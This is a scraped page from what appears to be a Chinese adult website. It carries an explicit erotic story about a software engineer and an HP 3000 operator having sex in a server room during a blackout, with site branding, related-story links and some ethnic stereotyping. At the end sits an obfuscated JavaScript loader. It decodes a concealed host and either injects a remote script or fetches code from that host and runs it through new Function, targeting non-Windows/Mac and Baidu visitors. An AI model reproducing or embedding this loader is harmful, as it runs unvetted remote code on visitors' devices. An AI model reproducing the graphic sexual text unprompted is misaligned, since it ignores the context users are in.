返回

机房的奇遇夜ce1

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

星期五下午六点,我走进机房,MIS的人全走了。事实上,除了夜班的技术员外,全公司的人差不多都走光了。老美们都是这样,不管有什麽事,一到周末,早早就翘头去享受假日,一切麻烦都等到星期一;难怪老美都痛恨星期一。我为什麽还在这 呢?因为:一、我是软体工程师。二、我的经理要我兼任系统管理。三、我休假了两个礼拜。四、我的经理在这两个礼拜里,为了表示他也懂UNIX,把所有的档案系统来了一次乾坤大挪移。五、为了平息众怒,他要我「悄悄」地把它们还原。六、两个月前他刚加了我百分之十五的薪水。所以我只好来收烂摊了。这个机房是MIS的机房,我们部门借用部份空间来设置主机,主要是考虑到它有个不断电设备。说是不断电,其实也只能撑个几小时。更糟糕的是,没人知道究竟能撑几小时。我早早就告诉MIS的老黑经理汤尼,建议他找个时间测试一下。这家伙也是吊儿啷当,不当一回事。在碰过两次壁之后,我告诉自己,走着瞧吧。我坐下来,打进密码,进入SUPERUSER的帐号。许久以来养成的习惯,第一件事就是拷贝。不管我如何恶搞,至少还可以回复到动手以前的状态。事实上这个习惯的确帮过我许多大忙。我估计拷贝重要的部份大概要一个小时,穷极无聊之下,我连上MIS的PC网路,看看有什麽新玩意儿。就在一大堆文件档案和试算表之中,忽然瞄到有个JPEG目录,这可新鲜了。进入那个目录,除了满满的档案外,还有个显示程式。我任意地挑了个档案,用显示程式打开一看:妈妈咪呀!一副纤微毕露的胴体在高解析度的萤幕上悠懒地伸展着。别搞错,不是我少见多怪,实在是它不应该在这儿。公司的人事部门一直重覆地三令五申有关性骚扰的问题,像这种图片,是绝对禁止出现在公司的。想到这点,本想马上跳离这个程式,以免惹祸上身;转念一想,一来又不是我存的档案,与我无关,二来这时候机房又没有别人会来,三来实在是太无聊了,于是我将程式设到投影片模式,让它自动显示一幅又一幅的图片。看着看着,我不禁有点心猿意马起来。忽然,从我身后传来一个女声。 「罗杰,你在干什麽?」刹时,我全身冰冷,本来的旖念马上到了九霄云外,一瞬间转了好几个念头,从降薪到解雇都想到了···。定一定神,转头一看,是MIS的洁西卡! 「我···我···碰巧在你们的网路上···嗯···所以···嗯···」她轻轻一笑。 「别紧张,没事的。那些都是汤尼的档案。」 「汤尼?他怎麽敢···」 「他一直偷偷地从Internet上抓这些东西下来,早已是MIS里半公开的秘密了···」她瞄了我一眼。 「罗杰,别看太多了,当心晚上睡不着。」我顿时面红耳赤。赶紧跳出显示程式。 「奶怎麽还没走?」 「日本分公司要一些报表,汤尼要我连夜印出来传真过去。你呢?」 「喔,就是一些系统管理的琐事,奶知道的。」 「这种琐事啊?···」我大感窘迫。这些老美!什麽都不会,teasing人最行! 「···我只是开玩笑。」必然的注脚。 「我知道。」 「好啦,我得赶快印报表了。」她走到机房的另一端,开始操作那套HP 3000。看着她走开,我强迫自己将注意力放在主机萤幕上。刚好也拷贝完了。我开始重新分割档案系统。经过许久,脸上的燥热才消退稍许。这时,我才敢向另一端看去。洁西卡已经清好档案,准备要列印了。洁西卡是MIS中的HP 3000操作员,年纪约莫二十三、四岁,有一头褐色及肩的的长发。虽然她不像会计和行销部门那几个肉弹一般受人注目,大家还是公认她很CUTE。虽然我和她不是很熟,机房进出的次数多了,多少还能聊上几句。反正老美最注重SOCIAL,多聊聊总是没错。她其实是蛮活泼的,不晓得她怎麽忍受像操作员这种枯燥的工作。洁西卡有一副匀称的身材,想必是健身房和海滩的常客。大概是刚刚图片的影响吧,我开始幻想着她白亚麻纱洋装下的胴体。 「罗杰,你能帮我一个忙吗?」我吓了一跳。回过神来,原来印表机又卡纸了。这个老印表机是80年代的古董,体积有我们SUN Server的三倍大。操作起来不但声势惊人,还常常卡纸,早就该淘汰了。 「当然,怎麽帮奶呢?」 「请你抓住这根导杆,当我从印表机底侧装上新的报表时,将报表引入导杆下面。」我站在印表机旁,看着洁西卡蹲下去装她的报表。突然之间我发现我正好直直望进她洋装低垂的领口。我不是个窥视狂,但是有此大好机会,当然也会老实不客气地饱餐秀色一番。呈现在我眼前的,是浑圆的双峰。在一片白晰之中,只见两点粉红。我忽然意识到:她衣服里面什麽都没有穿!从我站的位置望下去,见到的是两颗饱满的圆球,随着她手臂的动作轻轻晃荡着。那微微颤动的椒乳,完全吸引了我的注意力。我只觉手心微热,心想着不知将手探入那双峰之间会是什麽样的感觉。就在此时,洁西卡装好了报表,抬起头来,要我把报表拉好。我连忙将头转开,假装没有注意她的身体。虽然如此,我想她仍然从眼角里看到我头部突然的动作,想必也清楚我在看那里。但她没有说什麽,只是谢谢我的帮忙。我回到主控台前,继续未完的工作。心思和眼光却一直飘回到洁西卡的身上。突然之间,机房一片漆黑,跳电!不但机房变黑,连外头的办公区域也是黑的,看来整栋楼都停电了。不一秒钟后,紧急照明灯亮起,让我还可以见到周遭。我赶紧走出机房,站在走廊上向窗外望去。其它公司的大楼也是一片漆黑。这整个街段都停电了。 「发生什麽事?」不知什麽时候,洁西卡来到我身边。 「我猜大概整个街段都停电了。」 「我最好把报表赶快印完。」 「没错。」于是我们走进机房,加快工作的速度。十分钟后,我已经将档案系统划分好。电力仍然没有恢复的迹象,我决定关掉主机。同时,洁西卡也印完并且关掉HP 3000。 「该死!」 「什麽事?」,我问。 「没有电!我怎麽传真呢?」我沉吟一下,「或许我们可以把传真机搬进来,利用这里的电源。」 「好主意!罗杰!」于是我将行销部门的传真机搬来,洁西卡弯下腰,整个上身趴到桌上,伸长了手构取落在机器后面的电话线。我的目光落在她微翘的臀部,发现那当细细的亚麻纱布不但无法掩盖住她内裤的印子,反而紧绷地将她臀部的曲线显露无疑。在昏暗的紧急照明灯光下,她的臀部有着一股莫明的诱惑力。我几乎克制不住想要碰触她的冲动。我只觉得一股欲望缓缓升起,低头一看,我的下体竟然起了反应。更糟糕的是,正在拉扯电话线的洁西卡突然失去平衡,整个人退了两步,臀部就顶在我的隆起之处。 「噢!对不起···」,她转头看着我,「···这是什麽东西?」我心里砰砰地跳。 「对不起,我···我不是有意的。」说着说着,我退了一步。想不到她也退了一步,臀部仍然紧贴我的勃起。不但如此,我还可以感觉到它正轻轻晃动着、磨擦着。我只觉血脉贲张,已经发硬的部位又更加硬挺了。 「你刚刚在看什麽?」她臀部的压力加大了。事到如今,也没有什麽好隐瞒的。我伸手握住她的腰部,将她转过来。 「我一直对奶有着一份绮想。」她没有说什麽,只是靠上来,给我轻轻一吻。 「跟我做爱!」我叹了一口气。为什麽我遇见的美国女孩都这麽积极?对我一向主动的男性角色未免有所损伤。但我还能说什麽呢?我揽住她,开始搜寻着她的双唇。我用舌头轻轻地舔舐着她的上唇,她分开双唇,将我迎入她的齿间。她细嫩的舌尖,如蛇般地缠着我的舌蕾。吸吮着,探索着彼此口腔的内壁。一股热流冲上我的脸颊。我的右手慢慢地移上她的体侧,滑过腋下,手指圈住了她乳房的周圆,让掌心掂算着她乳房的重量,感觉着她乳房一点一点地坚挺起来。我的左手轻轻抚摸她背部的凹槽,缓缓地滑下她浑圆的臀部。她钩住我的颈子,无声地颤抖着。我张开嘴唇,吸吮着她的樱唇,攫住了她轻吐的舌尖。这一次,我将她的舌头深深地引入我的口中,让她微甜的唾液滋润我火热的双唇。我垂下右手,一路探索,直到她的臀部。双手微微用劲,一副火烫而又匀称的胴体紧紧地贴了上来。贴着我胸口的,是她坚挺的双峰;紧顶着她小腹的,是我勃起的性器。我用力抱紧她,只想要分享她胴体的温热。她的手抚摸着我的背肌,轻轻按摩着我的后颈。我闭起眼,享受发根传来阵阵麻酥。我将手探入身躯之间,手背滑过她充血硬挺的乳尖,将她上身的钮扣一一解开。我的手从衣襟中悄悄掩进去,把她的洋装慢慢拉到腰际。一对圆滚白嫩的乳房晃荡着,双峰之间的深谷,曲幽地直通平坦细嫩的小腹。我的双手轻轻握住她的胸脯,掌心覆盖在乳晕,徐徐地揉捏着直到它们完全充血硬挺。她的手摸索着解开我的拉炼。只觉一只温热的手,圈住我的阳具。一面揉着,一面将它拉出衣物的束缚。那只灵巧的手!它搓着,揉着,上下左右地摇晃着,测量着我阳具的长度,评估着我双球的重量。我的欲望从来没有像这样地被挑起过。她的唇离开我,一路梭巡往下。舌尖过处,留下一道湿热的轨迹。我的手掌随她下滑,仍然恣肆地爱抚她的双乳,直到它们移下超出我所能及的范围。她将我的衣裤完全褪去,人却蹲在那里,没有要起来的意思。莫非她要···?我心想着。一只手搓揉我的阳具,另一只手扳弄着阴囊,洁西卡的舌头开始从我的膝盖内侧,沿着大腿爬上来。当她接近我怒张的阳具时,她用双手紧握住我的根部。我屏住了气,几乎不敢呼吸。她将它塞入了口中。我的喉咙不自禁地低吼了一声。从来没有女人曾经这麽主动地为我口交。以前的辛蒂,凯伦,甚至那个墨裔的西西亚,都要我将她们挑逗得够了,才肯亲吻我的阳具,但也都是浅尝而止。在台湾的女孩子更不用说了,怎样都不肯尝试一下。但这个洁西卡却在第一次就···。我再也想不下去了,因为她正含住了我的前端,用她的唾液浸润了我最敏感的沟槽。她将我在嘴里上下套动着,用舌头和口腔内壁磨擦着我的全长。一手揉转我的根部,另一手则不停把弄我的两颗小球。除了持续地对我的全长加以刺激外,还不时的轻舐着膨大紫红头部下的敏感点。我只觉我的生命正一点一点地被她吸乾,注意力也逐渐模糊,唯一感觉到的,只有她火热的嘴唇和下体不断升高的快感。激情从我的感觉最敏锐的一点升起,随着她的韵律,一波一波地将我往高峰上推去。我知道如果照这个速度下去,我将会撑不了多久,我必须赶紧设法挽回。但我肉体感官的刺激,却又让我无法动作。不,是不想动作,只希望这欢愉能无止境地沿续下去。突然间,她停止吸吮的动作,舌头却在前头的敏感点上转了几转。一阵抽搐冲上我头部,我赶紧制止她,急急地抽出。幸好我及时反应,虽然有一滴白浊的液体在我抽出的同时射入她的口里,还不算是彻底失败。我将她从地上拉起,小心翼翼地不让她再碰触我濒临爆炸的阳具。如果她再多碰一秒钟,我铁定当场丢盔弃甲。我把洁西卡抵到桌沿。她看着我,舔着舌头,脸上一副似笑非笑的表情。我不觉有点恼火,这样未免太失面子了。我狠狠地吻她。双手攫住了她富含弹性的双乳,恣意地抚弄着。混在她的唾液之中,我仍然可以辨出自己前戏流出液体的味道。我转移目标,微微地含住了她的耳垂,舌头在耳垂边沿轻舐,她嘴里传出一声呻吟,背上皮肤浮起一片敏感的鸡皮疙答。我于是尽情地舔舐着她的耳垂,双手仍然恣意地爱抚着她未曾设防的乳房。她没有任何动作,只是一阵一阵地颤抖,以及嘴里不时的深喘声。我的嘴向下游移,经过脖子,擦过锁骨,深深地埋进她的双峰之间。她胸膛剧烈地上下起伏喘息着。看着她充血涨大、骄傲地挺出高峰之巅的粉红蓓蕾,我不禁用嘴唇和舌头圈住它,咬啮着她傲人的蓓蕾,洁西卡的双臂环抱着我的头,紧紧地贴住她的胸膛。我将她半褪的洋装完全解开,让它滑落地上。阻隔在我们之间的,只剩下她的裤袜和一条比基尼内裤。我将手探入她双腿之间,发现她已完全湿透!我开始隔着裤袜和内裤,摩擦她最隐秘之处。洁西卡的鼻里传出一阵阵的咿唔之声。她上身前耸,臀部也回应着我手指的动作。我更往下滑,双手也同时将她的裤袜退下。舌尖探索她大腿内侧柔软的皮肤。当我越逼近她的隐私处,她的呼吸也越急促。当最后到达目的地时,她吐出一声欢愉的轻叹。我隔着湿透的丝绸,用舌头探索她的奥秘。她薄薄的丝质内裤,一下子就被我的舌头紧紧地黏贴在弧线之上,更陷入中间的凹槽之中。她双手扶在我的脑后,弓起一只腿,圈住我的后背,口中轻轻呻吟着,尽力将我的头向下体推去。我感觉到她的欲望,她的需求,她的紧张,她的期待。我拉开那片小小绸布,曝露出浅褐色的毛发和微红的一线,将嘴唇深埋进她的欢愉之中。她的腿再也支撑不住,缓缓的软倒下来。我抓住她的臀部,将她整个人平放在桌上,唇舌仍然不休止地探索她柔软的凹槽。她将双腿紧紧勾住我,用臀部的舞蹈和低沉的鼻音回应我舌尖的韵律。她整个人都已软瘫在桌上。忽然间,她制止我嘴唇的运动,将我拉起来,覆压在她身上。我只觉得她颤抖的手指,急切地寻找着我的下体。 「干我。」她张开口,近乎无声地要求。在我来得及有任何反应前,我发现我的阳具已经深深插进她热似洪炉的体内。那种感觉几乎无法形容,就像一阵电流唰地一声闪过我的身上。我原本半软的阳具瞬时间完全地硬挺。她发出呼喊,蠕动着臀部,邀请着我更直接的刺激。我缓缓推进,又缓缓撤退,感觉到她的肌肉一 一 被我的全长伸展着,又一 一 地回复着。她双眼紧闭,享受着这种近乎撕裂的快感,和推进最深处时对着核点的刺激。她胸膛开始剧烈地上下起伏喘息着。我逐渐加快冲刺的速度,一次又一次地顶碰她的核点。撞击的力道传递到她的上身,泛红的双乳也随着韵律,来回弹跳着。我低下头去,张大了口,尝试捕捉她弹跳不已的乳峰。一次,两次,终于攫住了她怒涨的桃红。瞬时间,她再也克制不住,双腿圈住我的腰部,大声的呼喊请求着更多的欢愉。 「噢!噢!噢!···干我!···噢!···干我!···用力的干我!···」我加快冲刺的速度,心知撑不了多久。有心要缓上一缓,洁西卡的乞求和呻吟却让我慢不下来。我一次又一次地刺入她的深处。她弓起背,抬高了臀部迎合着我的撞击。我抓住她的双腿,将它们架到我的肩上,以近乎垂直的角度,对她的娇躯一波波地蹂躏着。我冲刺的速度提升到极点,汗珠从我额上流下,汇聚在我的下巴,一滴滴地溅散在她布满晶莹汗滴的胸脯。洁西卡陷入半狂乱的状态,她的头激烈地左右摇晃,双手用力捶打着桌面。 「噢!···噢!···YES!···YES!···」我知道我已经到达我的极限了,在下面任何一秒钟我都会彻底地失控。我使出疲惫肌肉里仅存的一点力量,一面伸手粗暴地抚弄她的核点,一面重重地对她施以最后数击。 「噢!···噢!···我要···」突然间,她停止动作,寂然无声,全身控制不住地颤抖。在她体内深处,一圈肌肉套紧了我,剧烈地痉挛着。一股快感从我根部涌起,双腿一阵抽搐,我再也禁不住了,伴随着数声低吼,深深地将一注注白浊的液体射入她持续地痉挛的体内。她轻声地啜泣。从过往的经验里,我知道我的粗细和老美不相上下,硬度或许还更胜一筹,即使长度比起老美还差上一两寸,只要慢慢培养气氛,那些白种女孩一样俯首称臣。只是没想到洁西卡的反应会这麽强烈。早知道我一开始就上她了。我没有动作,只是让她的腿从我肩上滑下。我的阳具虽然逐渐消退中,还是留在她的体内。不为甚麽,只因为我仍然想享受她极度紧缩的阴部。过了好一阵,她终于睁开眼,对我浅笑。 「你很行嘛!我本以为东方人都不···」我伸出一根手指,制止她再说下去。然后我将头平贴在她的双峰之间,只想静静地温存一下··· 「罗杰!醒来!罗杰!这里不能睡!」我悚然惊醒,有点困窘地移开身子。从地上拾起衣物,递给洁西卡。我们不发一言地穿好衣服,我帮洁西卡把FAX发出去,收拾好东西,互道晚安而各自离开了公司。虽然我们极力装出什麽事都没有发生,但我们彼此都知道,经过今晚,我们的关系将会不一样了。至于会发展到什麽地步呢?我也不知道。



评分
相关推荐
3.0分

3.0分 机房奇遇夜fdc

3.0分

3.0分 机房奇遇夜-淫妻奸情bc2

3.0分

3.0分 机房豔遇365

3.0分

3.0分 巧合的机遇318

3.0分

3.0分 钓鱼奇遇钓鱼奇遇b7f

3.0分

3.0分 钓鱼的奇遇c8e

3.0分

3.0分 阿章的奇遇fd3

3.0分

3.0分 奇遇69f

3.0分

3.0分 奇遇69f

3.0分

3.0分 奇遇69f

3.0分

3.0分 北京合租房遇见的各种奇葩各种极品724

3.0分

3.0分 租房子的艳遇80e

3.0分

3.0分 租房子的艳遇80e

3.0分

3.0分 租房子的艳遇80e

3.0分

3.0分 94.遇到劫机753

3.0分

3.0分 手机短信带来的艳遇c86


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};